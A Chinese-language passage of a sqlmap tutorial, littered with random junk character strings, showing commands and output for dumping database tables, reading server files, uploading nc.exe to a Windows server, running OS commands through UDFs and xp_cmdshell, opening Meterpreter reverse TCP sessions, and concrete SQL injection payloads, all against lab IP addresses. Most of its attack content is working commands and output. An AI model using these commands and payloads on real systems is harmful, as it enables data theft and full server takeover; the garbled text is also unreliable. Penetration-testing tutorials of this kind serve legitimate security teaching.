& \0 h( a7 G$ I- I有时候用户只想获取表中的数据个数而不是具体的内容,那么就可以使用这个参数。* b# }/ Y, n) K3 R6 {' [
+ \) B0 G* R% H, J/ U' a6 v
列举一个Microsoft SQL Server例子: * d6 e& L2 w, Q4 j% N: \ - M' B) G1 _9 R T$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --count -D testdb* h% ^ b+ D) J, |; A5 G: O5 D! ~
[...] ; G5 E+ U0 o, C' h- } L! kDatabase: testdb; c, Q6 Q8 T( o/ l0 v& N
+----------------+---------+ 9 b# ]! T, W6 Q1 K* k. b| Table | Entries | 2 o* ^& U: [" r+ h+----------------+---------+2 x' @4 n5 j$ O. V# y! ]: U4 R) r
| dbo.users | 4 | ) I' b% E7 p* q/ G7 _- L8 H| dbo.users_blob | 2 | ' y+ D' }% i( U: D- O. o! P+----------------+---------+ 0 j" W+ [; J) M7 v9 F B Z& |; j+ f3 n5 D8 E6 B ?
获取整个表的数据 ; x6 N: N& T9 H" ?. t2 p. v( M/ o4 k
参数:--dump,-C,-T,-D,--start,--stop,--first,--last 8 z5 m+ D- L1 a; m9 [7 Q) l # @- i" Y! G) T$ I+ V$ k如果当前管理员有权限读取数据库其中的一个表的话,那么就能获取真个表的所有内容。1 o& d% ~5 ^) M" Z, h- ]
# k+ E9 ]& o4 G8 X `- l# o
使用-D,-T参数指定想要获取哪个库的哪个表,不适用-D参数时,默认使用当前库。 & z# D4 b; j& g& x+ ?. y5 B, d2 S" ]- f4 @
列举一个Firebird的例子:- ?, t7 \7 N/ d( P( a
5 V: d0 P+ K, o: {; V
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/firebird/get_int.php?id=1" --dump -T users / H5 m1 P: U, d[...] b+ i3 D' ?' b3 e' Y, XDatabase: Firebird_masterdb- f+ c4 A9 B6 ?/ a; F3 }/ Y+ H
Table: USERS5 S0 m1 |) O: @9 r* J
[4 entries] 1 z* B" y, D9 p" e+----+--------+------------+4 s+ p( A5 J% E9 l* }- a
| ID | NAME | SURNAME | % l) C w$ l- _0 F2 z9 z+----+--------+------------+ - `4 k5 S! \( ?7 L9 F| 1 | luther | blisset |6 E) q q+ A" u& Q
| 2 | fluffy | bunny | 0 _, I9 {0 S q| 3 | wu | ming |' ~7 G) i3 n4 P! O6 R2 D' P4 o
| 4 | NULL | nameisnull |1 n4 P3 e( }- K5 Q
+----+--------+------------+6 `- s6 J$ v- m3 l3 C9 O5 @% f" J( Q
H% Q- N" }' r, |
可以获取指定库中的所有表的内容,只用-dump跟-D参数(不使用-T与-C参数)。 ) d5 ]' O, g/ y% Z8 _ c( l" Z N U/ X0 X9 J' @也可以用-dump跟-C获取指定的字段内容。 1 _5 {5 U% f0 l. P' B. ~/ F* v# C5 T
sqlmap为每个表生成了一个CSV文件。0 D+ J, M: L% s/ l
9 k# U {7 n' |- [
如果你只想获取一段数据,可以使用--start和--stop参数,例如,你只想获取第一段数据可hi使用--stop 1,如果想获取第二段与第三段数据,使用参数 --start 1 --stop 3。/ ]* G% `2 P* P. E
9 N) }' ]7 j) g也可以用--first与--last参数,获取第几个字符到第几个字符的内容,如果你想获取字段中地三个字符到第五个字符的内容,使用--first 3 --last 5,只在盲注的时候使用,因为其他方式可以准确的获取注入内容,不需要一个字符一个字符的猜解。 $ A# B5 B3 s* O% C% V获取所有数据库表的内容 % K+ i* _/ {) A' }6 S ! Y4 o1 c) g q7 D8 ~0 `参数:--dump-all,--exclude-sysdbs# z8 n. L6 d7 G6 v; a" c
7 S" p4 h2 l9 |- f使用--dump-all参数获取所有数据库表的内容,可同时加上--exclude-sysdbs只获取用户数据库的表,需要注意在Microsoft SQL Server中master数据库没有考虑成为一个系统数据库,因为有的管理员会把他当初用户数据库一样来使用它。& j. u7 H5 Z l# z% u: i
搜索字段,表,数据库' Z f* K/ u6 A
0 q( O( b% ~! F* c1 g( ~' u- l5 ]6 j: @参数:--file-read 2 e: C: W* y, U! y; A * p& f0 ?4 d" `当数据库为MySQL,PostgreSQL或Microsoft SQL Server,并且当前用户有权限使用特定的函数。读取的文件可以是文本也可以是二进制文件。 * V! T- z- ^2 @& O" C, ~9 U: C& @0 Q) X, k9 \
列举一个Microsoft SQL Server 2005的例子: . q( W) U% V$ h ( F' o. ?0 M3 L0 G* C$ A* B$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther" \ ) B$ w% L i" i--file-read "C:/example.exe" -v 1 ' E7 Y/ y# D6 e; D- z! B9 B$ `3 M% c [/ w& m! ^! V. H
[...] $ n c$ t( y3 x. p/ X# D[hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server. W. t# ?4 j3 N4 o- |8 g5 J$ w) F
web server operating system: Windows 2000 * ]4 C! f( ?1 b0 |# J, mweb application technology: ASP.NET, Microsoft IIS 6.0, ASP : E/ E9 {2 V8 t9 c8 Z O/ Wback-end DBMS: Microsoft SQL Server 2005 + X& e0 [# G/ T. H W v2 z5 H0 H6 z* P- B
[hh:mm:50] [INFO] fetching file: 'C:/example.exe'% u$ T% i4 N5 n+ S
[hh:mm:50] [INFO] the SQL query provided returns 3 entries " ~( z7 X' [# z: Z& c8 mC:/example.exe file saved to: '/software/sqlmap/output/192.168.136.129/files/C__example.exe', I& G4 |3 Y" g7 L, `
[...]# O# O9 d! x& P
f6 a! @. M! E Y% |, J3 X1 U$ ls -l output/192.168.136.129/files/C__example.exe & e+ N8 y2 [# e' @
-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C__example.exe 3 L2 H# d' }) F" i" l% Y& Q! }7 K# D* t4 y; p5 q# V% G
$ file output/192.168.136.129/files/C__example.exe & C( c4 |% G4 S5 ^0 v7 K4 h
output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel 4 C! s4 L- F. c1 ^8 h4 P R80386 32-bit) h5 V+ z& g8 ~; M- Z4 l) a
2 T0 {5 l" e) t. Q把文件上传到数据库服务器中 8 G! @1 v3 Q' Y+ }+ I$ A& T6 Z$ L- i4 }, Y. f, ]% a; U# n0 A
参数:--file-write,--file-dest 4 P c2 E' S% @' @% a, a. J# [( y+ b- ?; G3 ~
当数据库为MySQL,PostgreSQL或Microsoft SQL Server,并且当前用户有权限使用特定的函数。上传的文件可以是文本也可以是二进制文件。& R0 D! \& s, A/ ?0 l) r
* W1 Z" Z8 N( D- D+ g9 k' U列举一个MySQL的例子: / t. N% C4 S w6 c5 A% ]: M6 H% Y8 a' l) D( N" m
$ file /software/nc.exe.packed - |3 v' z( }; {- v }# N. c
/software/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32-bit! L( k- e7 ~, q1 ~" R1 `- K
' ^2 o' W+ S5 V" D. ] g/ i$ ls -l /software/nc.exe.packed 0 u( h" u( m2 V0 \. p! z0 k" B. r-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /software/nc.exe.packed " @# v" v/ s' p9 ?/ t" L! N- T, T 9 C; o/ E0 N, P) N) \$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file-write \9 ?5 x @& T6 W
"/software/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1 # L( w% K. G. J% _! H; x0 a ! c) V3 ?2 m- z; ^5 M( R[...]: Y% E- F5 I! d( ], f* l2 A
[hh:mm:29] [INFO] the back-end DBMS is MySQL 5 i" ^* s8 z* A* Yweb server operating system: Windows 2003 or 2008& r2 F/ l0 [: P& g7 r& U7 v
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 " G: E5 P ]4 l" V3 Bback-end DBMS: MySQL >= 5.0.0. O5 ~, N- A8 L R3 \5 G
8 |' l+ X, ~! q; C# S
[...] & Z; O( C& }/ Rdo you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully 8 I- u% {+ J( y3 r. Vwritten on the back-end DBMS file system? [Y/n] y ' u4 z/ R3 L8 l4 A$ ]4 t% {[hh:mm:52] [INFO] retrieved: 31744 2 f2 {, }2 R, d' i5 c) \' L[hh:mm:52] [INFO] the file has been successfully written and its size is 31744 bytes, ; R: _) T4 v8 f! L' ?& h7 C
same size as the local file '/software/nc.exe.packed' ( u# V# ^: h: s: R# k; v4 U1 f4 e0 m# Q$ V+ R9 ?1 d6 s8 u
运行任意操作系统命令 2 y( n7 ~3 q, |( e" f8 j& ?1 q9 S; J ( e; W/ p( h9 H P- p7 O+ r参数:--os-cmd,--os-shell + t5 u; i6 ^! g5 r k! m 7 L, ]' J! a& J$ d4 a/ J8 U1 ]当数据库为MySQL,PostgreSQL或Microsoft SQL Server,并且当前用户有权限使用特定的函数。 * ` P( _& M; k ) C+ K" R" w* z2 ^在MySQL、PostgreSQL,sqlmap上传一个二进制库,包含用户自定义的函数,sys_exec()和sys_eval()。 7 X' z: a* t3 e q2 Y; z/ K$ |* m. _7 }4 K/ u
那么他创建的这两个函数可以执行系统命令。在Microsoft SQL Server,sqlmap将会使用xp_cmdshell存储过程,如果被禁(在Microsoft SQL Server 2005及以上版本默认禁制),sqlmap会重新启用它,如果不存在,会自动创建。 ! s! S% N" l: E0 W % u2 b( E9 V" E& n" k3 I列举一个PostgreSQL的例子:7 K* E& n3 P) k' V) Z
( M' {; q- I0 w$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" \ C: e. q5 t$ V
--os-cmd id -v 1 * x$ T l' K) u! S+ R& K# b# v 7 S! I# }, S4 P0 v[...] . M0 }% H& j6 y+ G. {4 Tweb application technology: PHP 5.2.6, Apache 2.2.9) R) H* r* f0 {; Q
back-end DBMS: PostgreSQL) b _: S* O; M7 U& [3 Y
[hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system! I8 q8 O# e9 r# E3 r3 j
[hh:mm:12] [INFO] the back-end DBMS operating system is Linux 5 L4 [- V& i- v[hh:mm:12] [INFO] testing if current user is DBA- Y* K% j' i4 P5 h1 q) Q+ p7 V
[hh:mm:12] [INFO] detecting back-end DBMS version from its banner( E, G4 k8 S& \! h. k
[hh:mm:12] [INFO] checking if UDF 'sys_eval' already exist 3 G1 \! ^- J, k. Z7 Q[hh:mm:12] [INFO] checking if UDF 'sys_exec' already exist- N9 |4 g7 [* T+ R+ X( F0 v0 A3 b
[hh:mm:12] [INFO] creating UDF 'sys_eval' from the binary UDF file$ Y+ P1 e4 h2 d8 Y' X x+ v
[hh:mm:12] [INFO] creating UDF 'sys_exec' from the binary UDF file 2 W8 @) p2 }0 ~4 x1 X1 \" Tdo you want to retrieve the command standard output? [Y/n/a] y* I6 } b5 n3 [) ~9 B
command standard output: 'uid=104(postgres) gid=106(postgres) groups=106(postgres)' " K* O+ a# \0 V2 O2 C$ s. [! H( d: b2 Z: D% n/ q& c
[hh:mm:19] [INFO] cleaning up the database management system7 y2 b" G/ \$ A Z2 A- ^$ V
do you want to remove UDF 'sys_eval'? [Y/n] y" M: f- n% s1 D5 i- X8 l
do you want to remove UDF 'sys_exec'? [Y/n] y& O" Q! y" m# Q1 n2 j7 H2 t
[hh:mm:23] [INFO] database management system cleanup finished ' @6 U8 k( L- y3 t8 W, ]. Y- u6 F[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file system can 2 F% K) C" g9 l+ [4 d# O$ vonly be deleted manually& x1 C+ o" j9 {
+ Y5 j8 z8 _1 `: H( M
用--os-shell参数也可以模拟一个真实的shell,可以输入你想执行的命令。 $ Y0 x4 ]- k' Z+ I 5 {4 L* J. d; A7 ]. M0 Z4 ^当不能执行多语句的时候(比如php或者asp的后端数据库为MySQL时),仍然可能使用INTO OUTFILE写进可写目录,来创建一个web后门。支持的语言: ' {. z8 v: D( }2 t; j / @5 G( p7 D+ g/ ~. Y. V4 e$ ]% i1、ASP / b* ]4 G8 d4 n& X" g/ W* ?2、ASP.NET % ^- S" S7 V9 a; u/ I' K' G3、JSP6 s0 S+ M- E; ^: h2 d
4、PHP2 C( p2 A& _; i* o
/ I1 \$ u: a# l* j/ T# VMeterpreter配合使用 * K8 D- \1 o) m+ D7 I; {% }% k! J4 {4 r5 Z) w, S
参数:--os-pwn,--os-smbrelay,--os-bof,--priv-esc,--msf-path,--tmp-path ( G* {* e2 f* n$ I- s& k: Z, q# D$ o5 @2 d1 Q
当数据库为MySQL,PostgreSQL或Microsoft SQL Server,并且当前用户有权限使用特定的函数,可以在数据库与攻击者直接建立TCP连接,这个连接可以是一个交互式命令行的Meterpreter会话,sqlmap根据Metasploit生成shellcode,并有四种方式执行它: - j7 c; _# q" q) @8 E' e. b. M! O2 k3 O, L
1、通过用户自定义的sys_bineval()函数在内存中执行Metasplit的shellcode,支持MySQL和PostgreSQL数据库,参数:--os-pwn。 / ~9 }, R L3 {* l2、通过用户自定义的函数上传一个独立的payload执行,MySQL和PostgreSQL的sys_exec()函数,Microsoft SQL Server的xp_cmdshell()函数,参数:--os-pwn。6 c; A; o3 Q }. T
3、通过SMB攻击(MS08-068)来执行Metasploit的shellcode,当sqlmap获取到的权限足够高的时候(Linux/Unix的uid=0,Windows是Administrator),--os-smbrelay。 & `1 N: p/ H) C k( V9 k, x4、通过溢出Microsoft SQL Server 2000和2005的sp_replwritetovarbin存储过程(MS09-004),在内存中执行Metasploit的payload,参数:--os-bof 3 R" o. b! N5 ?2 x1 T, v' L' U+ y B6 ]& B+ M. l: ?, l% a
列举一个MySQL例子: 3 S% c) S. H% A* m/ f3 P 6 K( l7 L4 L4 u! Z; D/ K/ m& |; r- T$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?id=1" --os-pwn --msf-path /software/metasploit & k% T9 ~0 y X. Y% b1 B . f0 ?- ~( W7 R N/ y7 \[...]: e$ g) \. [ u
[hh:mm:31] [INFO] the back-end DBMS is MySQL: g- U. T2 {4 M; C
web server operating system: Windows 2003 7 x9 F8 s" ?9 y3 [9 jweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0 1 R0 s. O1 b3 ?/ w/ D5 Eback-end DBMS: MySQL 5.0& Y- i3 H( l1 C! k$ [9 e4 B
[hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system # t7 P- ^2 Z! v9 f: Q! Z4 ^3 ~, I8 W[hh:mm:31] [INFO] the back-end DBMS operating system is Windows0 W e! A B% p9 c$ l
how do you want to establish the tunnel? 1 M! F! n# O7 e( Z, h& p0 z' B' ?[1] TCP: Metasploit Framework (default)# r4 P' d$ M0 f4 o) L3 j5 B
[2] ICMP: icmpsh - ICMP tunneling f2 ^( }: @9 N) r. I> ; K0 a ?: g- @, ]3 C
[hh:mm:32] [INFO] testing if current user is DBA$ S4 l6 ^6 K+ ^. D) l- N
[hh:mm:32] [INFO] fetching current user' f" |% {* r7 _; {8 X& K
what is the back-end database management system architecture? 8 P4 p, r0 ?7 _. J5 Y7 V) |[1] 32-bit (default) ; c8 p5 N6 r# `. l+ x/ u/ R% | a+ k[2] 64-bit, D9 ?$ p" E6 R5 p0 [
> ( j' `, r2 b/ B& f8 Y+ m# F
[hh:mm:33] [INFO] checking if UDF 'sys_bineval' already exist' k6 ]$ Q' q/ J5 a/ t
[hh:mm:33] [INFO] checking if UDF 'sys_exec' already exist 2 `0 H3 A( c+ w' H! X; b+ d[hh:mm:33] [INFO] detecting back-end DBMS version from its banner: C0 D0 C( O. [3 e1 @
[hh:mm:33] [INFO] retrieving MySQL base directory absolute path " O k' k5 k6 i8 n3 G" ~2 F( w[hh:mm:34] [INFO] creating UDF 'sys_bineval' from the binary UDF file3 u8 S( |# p( h+ |" I' D% K
[hh:mm:34] [INFO] creating UDF 'sys_exec' from the binary UDF file: R. a4 K, g9 m# R' _' P
how do you want to execute the Metasploit shellcode on the back-end database underlying * Y$ T* ?7 ]' m' w8 A b
operating system? 6 }3 k5 l$ `) A, S! n[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)2 I2 _" r& h* E; v# M8 u+ k
[2] Stand-alone payload stager (file system way) 8 A- t) [$ ]) L> 3 y# B6 H' P! ] e" i/ K
[hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode . o% Y6 [1 x" Rwhich connection type do you want to use? & {) ~2 f0 s& m Z& l- i+ D[1] Reverse TCP: Connect back from the database host to this machine (default); {7 X. s9 i2 E5 ~8 K. ]
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports 5 ~/ D2 O: q$ r/ |$ abetween the specified and 65535 . Z% a ]5 q- l+ }[3] Bind TCP: Listen on the database host for a connection 0 |8 ^% X6 z. l> ) S$ f, a7 r6 X* t7 \- Qwhich is the local address? [192.168.136.1] ! q$ u! a/ F2 k) Y; _
which local port number do you want to use? [60641] 5 M9 d, S2 P& @! u3 t6 f
which payload do you want to use? j x% [- t4 U0 _[1] Meterpreter (default) 0 q. W3 K! G: P- K[2] Shell - |0 q& q5 g9 @: ?% K7 B. a[3] VNC) N6 E F& M# ^5 Q; d
> 1 w/ A8 c" ?* ~1 F8 s7 m
[hh:mm:40] [INFO] creation in progress ... done 6 ~5 ], b4 p, v[hh:mm:43] [INFO] running Metasploit Framework command line interface locally, please wait..0 l( P/ Z: z, ^, o
' k- ?) U' y: l" g3 [有时目标没有关闭DBMS的报错,当数据库语句错误时,会输出错误语句,用词参数可以会显出错误信息。0 c( N1 `1 J2 u
) e9 ~6 O5 R5 y, K
$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --parse-errors : h# e. l0 h8 L t& Q! L# N9 q[...]3 i' P$ ?$ ]& Z# { ]; J" @
[11:12:17] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test , u$ a$ W9 `0 I9 @/ y[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)& @" G7 b: C9 S; Q* U" _
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is out of range of the number of items in the select list. ( }+ T0 z( ]7 a D0 w; g0 L2 l" i<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>' * V- o Z9 O) B* w+ C[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) $ @1 M4 ^% ?' A/ k[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of items in the select list.' w: [ {6 L2 D: a; h
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>' * p/ | l% P' O- U: t- Q! V$ q[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)! b) k2 y) L9 K* j+ T' T/ M! o9 i
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of items in the select list.; o- U }& q! ^* K4 }9 w
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'& q8 E6 J! a) I" Y
[11:12:17] [INFO] target URL appears to have 3 columns in query . r4 G2 j0 m8 d[...]" x/ ~! T- }; O- [( j+ Z6 w
3 V: m' Q6 u1 w, |( e7 E+ u
其他的一些参数 Y Z3 _1 B ]( ~& d
使用参数缩写6 p; }5 Y5 w2 ~9 w
2 N* O4 D1 w& k( [参数:--smart: ^/ G; x/ Q9 w
+ p7 R5 r0 r& `. I/ x0 ^5 D
有时对目标非常多的URL进行测试,为节省时间,只对能够快速判断为注入的报错点进行注入,可以使用此参数。9 G: s7 M% T1 f" T9 I
9 U1 @/ @& ?6 f3 I6 d3 m V
例子: 6 L. a8 e: Z/ ^0 u3 {9 v) H: y! J3 { 0 v% U3 O8 S/ j0 u: P$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart ) n! o& v/ g8 b0 U# J! O- `. E0 D[...] & T$ ?: i3 ~- p) N$ ]7 g[xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic 5 {1 G# Z9 h0 u/ j, X- h5 q. I[xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic# d2 |- U. ]* r7 b, F8 |
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable+ R/ l, N: e7 |3 Z" k/ |
[xx:xx:14] [INFO] skipping GET parameter 'ca' . M7 n# b5 }2 ]5 k2 P[xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic + ~ c# \/ e4 \' p) C[xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic 3 N; G4 Q( C! l$ }" M7 c" s0 V[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable ! b* D( h# r6 Y8 b5 ]3 l( \[xx:xx:14] [INFO] skipping GET parameter 'user' 5 u5 D' H* L0 y& G0 _1 u9 C2 E[xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic 8 N2 I( d9 @ n/ i2 t& h- }[xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic 4 I3 Q- ^7 _4 M9 V[xx:xx:14] [INFO] GET parameter 'id' is dynamic! [8 J7 V4 M0 J4 x* k2 t
[xx:xx:14] [WARNING] reflective value(s) found and filtering out 0 v: @& S4 o5 v1 Q[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL') K" z0 O/ K2 P2 p[xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id'1 d0 j7 F: Q: h: _* p" @
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y + L( y+ F u# |: N" B7 W [0 J, cdo you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y ) V; S) _4 j( W[xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' 4 S/ j; @( m% ?4 O) S x[xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable . S0 ^4 a0 N4 b' ][xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' * P( a3 I6 m" T% c[xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable % R& \9 C/ P L+ k' f1 ^0 d: j0 ][xx:xx:14] [INFO] testing 'MySQL inline queries' 4 C {2 ?& S+ A) [[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries') E4 {7 h4 m. |& ~) k1 p
[xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'/ \- K% a. P+ u* {7 i
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' 5 w0 U) ]5 }+ G[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable , B% X- z" b; K: d
[xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' 8 y! J0 L- i) |4 x[xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found # q" ^, W# w6 S) M3 o" j[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 1 r1 g9 q( O" j+ F6 U1 L, v+ p[xx:xx:24] [INFO] target URL appears to have 3 columns in query 1 a4 b5 I: b4 b, S; V' c[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable ( T* d0 C9 w/ L[...] " Y! X1 I$ `0 ?2 `) ` , H }, Z/ d, m9 Y( H初级用户向导参数 ( m1 o& K- x o* \ ) D* }, }; P, V0 E9 [( D/ A5 r参数:--wizard 面向初级用户的参数,可以一步一步教你如何输入针对目标注入。 % B1 \! ?" B# K0 s. k 5 g( ]# o' u7 S" d$ python sqlmap.py --wizard6 _4 G5 B% Y" o+ W6 V
# Q% Q' ?: O' P) }. U+ I; D0 C sqlmap/1.0-dev-2defc30 - automatic SQL injection and database takeover tool h/ b: A7 M9 m+ b
1 m$ t. V; C5 T, y6 V! |# R: @http://sqlmap.org. E: `0 l2 Y' d* q
, h& ]3 Y7 ], K
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program + @! e- Z2 {% o
starting at 11:25:26 / b3 k8 A$ K' @8 G 5 Q$ e. H1 d9 HPlease enter full target URL (-u): http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1 . P( k- a- x* s9 l* P$ \POST data (--data) [Enter for None]: & a( z7 R; m r
Injection difficulty (--level/--risk). Please choose: , r4 P+ i1 g4 ?1 P. [[1] Normal (default)7 Y( ^, \% R) {8 j5 @6 a( \
[2] Medium9 T3 ~1 o/ |5 ^' ?3 O
[3] Hard3 |4 x/ H N7 g& \+ ^: |. z6 J$ q8 t
> 1 " C. m% }% P4 } k4 W4 }3 ZEnumeration (--banner/--current-user/etc). Please choose:' K$ }7 ]& a* I( G2 E& L+ s3 E
[1] Basic (default)' P4 f$ B; w1 S4 K% M5 d% a1 T9 g
[2] Smart! O0 ?$ S7 R4 y3 w& W- O6 b, }
[3] All; ]) B) z& Q; f6 X4 I
> 1( F) O3 g% |- y
: N, M$ o7 e3 T( x0 ?& e% Q O2 }; I
sqlmap is running, please wait..! m- F |- }0 f3 l9 b. N, ?( p# w
+ T3 x. ^& O& ?' u
heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y 9 i* n! Q' p9 d0 S3 ]( |0 K- }. Ido you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y/n] Y ' L9 J; o0 a, n$ eGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N d7 B- a' K" O$ osqlmap identified the following injection points with a total of 25 HTTP(s) requests:) i, i* R& e2 V1 B/ O% Q9 a
--- ! P p. K& E3 [: s, Y7 f$ P) i; qPlace: GET% H& E9 l1 L4 [- B$ k) D9 _' O- c
Parameter: id" C+ X$ @) r2 O- I" p
Type: boolean-based blind9 U! I8 z( \" w; W
Title: AND boolean-based blind - WHERE or HAVING clause/ l* d% ?! A# {( s
Payload: id=1 AND 2986=2986 * X4 G8 C, a5 J9 z1 q 5 k- E4 O y. [ Type: error-based5 _# L& s; b4 m, H/ ^2 K: N9 E# r4 j
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause j# [. s2 _4 @& E5 z
Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (4847=4847) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58))) # m& A! Z) E4 x5 |) x$ {3 O0 U
Type: UNION query( x6 y* O. v) L/ v
Title: Generic UNION query (NULL) - 3 columns . N2 @& T6 I2 E; ?6 R+ `4 z- {, C/ o Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) CHAR(70) CHAR(79) CHAR(118) CHAR(106) CHAR(87) CHAR(101) CHAR(119) CHAR(115) CHAR(114) CHAR(77) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)-- 1 w2 a9 K: o8 z% r1 \) f3 W5 ^& O' L# a) z8 C6 L9 z) F1 d4 s6 j( d# d
Type: stacked queries7 S( T' I \) v! |# }6 K( Z; E
Title: Microsoft SQL Server/Sybase stacked queries . {% v$ v, j/ q Payload: id=1; WAITFOR DELAY '0:0:5'--+ y" Y9 Z6 k! j1 v$ p2 W' A0 ?) q
; K6 n( c0 W9 A: Q
Type: AND/OR time-based blind " b) p( g& Z1 Q; [# e! _( k1 `7 W6 Q) l Title: Microsoft SQL Server/Sybase time-based blind& S! s4 X: R: ^3 Q$ f
Payload: id=1 WAITFOR DELAY '0:0:5'--; h# q5 X4 `( {- ]) b8 a8 t
* [( D2 n5 A2 K# I$ @+ a Type: inline query 5 l1 ^* @9 U; H* g; p- L) y0 j, y Title: Microsoft SQL Server/Sybase inline queries) l1 c- w, G, e# R6 q+ ]
Payload: id=(SELECT CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (6382=6382) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)) : B6 I& b0 ]+ Z) e% N$ @--- : v5 c5 ]; S) K E) Y- yweb server operating system: Windows XP7 G. M8 G5 a; q3 c
web application technology: ASP, Microsoft IIS 5.1$ J- E) U: W Z; ~
back-end DBMS operating system: Windows XP Service Pack 2! H1 b3 m. P1 Q) d' d* e' M
back-end DBMS: Microsoft SQL Server 2005 / Y+ F$ L- K6 s' q S7 r! n6 abanner: 9 ^9 T, S( n4 Z" ?/ t---) L$ y( w* n3 a8 n0 a1 M) k
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) ( \1 ?7 T4 j) u* [1 }
Oct 14 2005 00:33:37 ) d2 { F3 V$ s% G, l Copyright (c) 1988-2005 Microsoft Corporation A) ?9 C5 h/ K2 F Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2) 4 f7 w2 {4 k; f" M. \0 C$ T; q---+ }1 U5 _: L8 A6 X% K; d Y6 V4 h) g
current user: 'sa' " D* |+ s2 R/ k) m. Qcurrent database: 'testdb'* Y& d- K4 Q! Z7 S4 @- ]8 P* [
current user is DBA: True